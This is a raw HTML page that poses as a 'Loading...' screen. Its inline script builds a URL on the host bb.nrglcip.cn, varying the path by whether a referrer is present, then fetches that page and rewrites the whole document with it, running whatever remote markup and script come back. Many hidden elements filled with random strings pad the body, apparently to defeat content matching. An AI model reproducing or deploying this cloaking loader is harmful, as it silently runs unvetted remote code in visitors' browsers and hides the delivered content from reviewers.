<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .VlXbThNrmR {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .VlXbThNrmR .SUwHPrA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .VlXbThNrmR .content {
            line-height: 50px;
            text-align: center
        }

        .VlXbThNrmR .img {
            width: 100%
        }

        .VlXbThNrmR .fFeAY1nxN {
            text-align: center
        }

        .VlXbThNrmR .fFeAY1nxN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .VlXbThNrmR .fFeAY1nxN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .VlXbThNrmR .fFeAY1nxN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .VlXbThNrmR .fFeAY1nxN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .VlXbThNrmR .fFeAY1nxN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .VlXbThNrmR .fFeAY1nxN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .VlXbThNrmR .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iCdpsgSdvjF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var COywRq = iCdpsgSdvjF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ COywRq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ COywRq +".html?a=share";
		}
		
        OQvSQk4=url+"#"+new Date().getTime();
        OQvSQk4 && function() {
            $.get(OQvSQk4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >L37PtKxtKsBP6x4</li>
<span style='display:none'>FrAoLLuEZ1Lacovp3Tun4iYiEHOtlBxP1WEFVGyDuqR9QLK89wBflu9iLxbX7xyclQ9IiEIeooa</span>
<img  src='' style='display:none'>
<div style='display:none'>nP1OGNasWqHTmpUb79G4EXUfZlm49KD8Vqos0z2xdo5wLvNzNUYQ5RsgMidD6L75uuaN2EGiZe8vKKaMzIPYYbZul0</div>
<span style='display:none'>FrAoLLuEZ1Lacovp3Tun4iYiEHOtlBxP1WEFVGyDuqR9QLK89wBflu9iLxbX7xyclQ9IiEIeooa</span>
<li style='display:none' >L37PtKxtKsBP6x4</li>
<b style='display:none' >h1TlGgf3swPty6cSvEUM6vLs</b>
<img  src='' style='display:none'>
<ul style='display:none' >tJjccosdxOxUaL96Elxj4QksLe86OCmg7DNuiJVIIj7jDwr0XmIiSzgwzp4aiHdBL20OqbirlQxZB8FaYXOqdtvTj2pZ</ul>
<span style='display:none'>FrAoLLuEZ1Lacovp3Tun4iYiEHOtlBxP1WEFVGyDuqR9QLK89wBflu9iLxbX7xyclQ9IiEIeooa</span><div class="VlXbThNrmR">
    <div class="SUwHPrA">
        <div class="fFeAY1nxN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Rl92eTy4Ft8usNmjH8UHTFrzsuJOLAbHNDmgdLnZJV1XWPmFvBLEFeZqI9N5x2kqceyTKICmQSIC7cJGXqr9dXETTtdBIiLEgfs</p>
<h1 style='display:none' >FBRs33N34cXxYFInJ</h1>
<a  href='#' style='display:none'>s9NQLJh5DBjEhlC0QbNRa0y0sgR6jzJpYYh1lW9FrVlRLvoaedGgOuNucw32XvLbhjCp</a>
<div style='display:none'>QKLnYYnbNpFK1n4iiouXM1fqDIJdAt4KQqbiIzLyrCWYE57GfxniYJJK85DHD22AP6DvSbL2IyD4LMRURoB09RpTtg</div>
<img  src='' style='display:none'>
<span style='display:none'>K9vVxOf490aXy8PYqRYNpeRPtynkEGjnKIrQc4TIptXVmaZ6qP3LT6B27bugj83aU0DAjf6TxaQ79WiCVSPsrbm1OQXzCEr2YF8</span>
<span style='display:none'>K9vVxOf490aXy8PYqRYNpeRPtynkEGjnKIrQc4TIptXVmaZ6qP3LT6B27bugj83aU0DAjf6TxaQ79WiCVSPsrbm1OQXzCEr2YF8</span></body>
</html>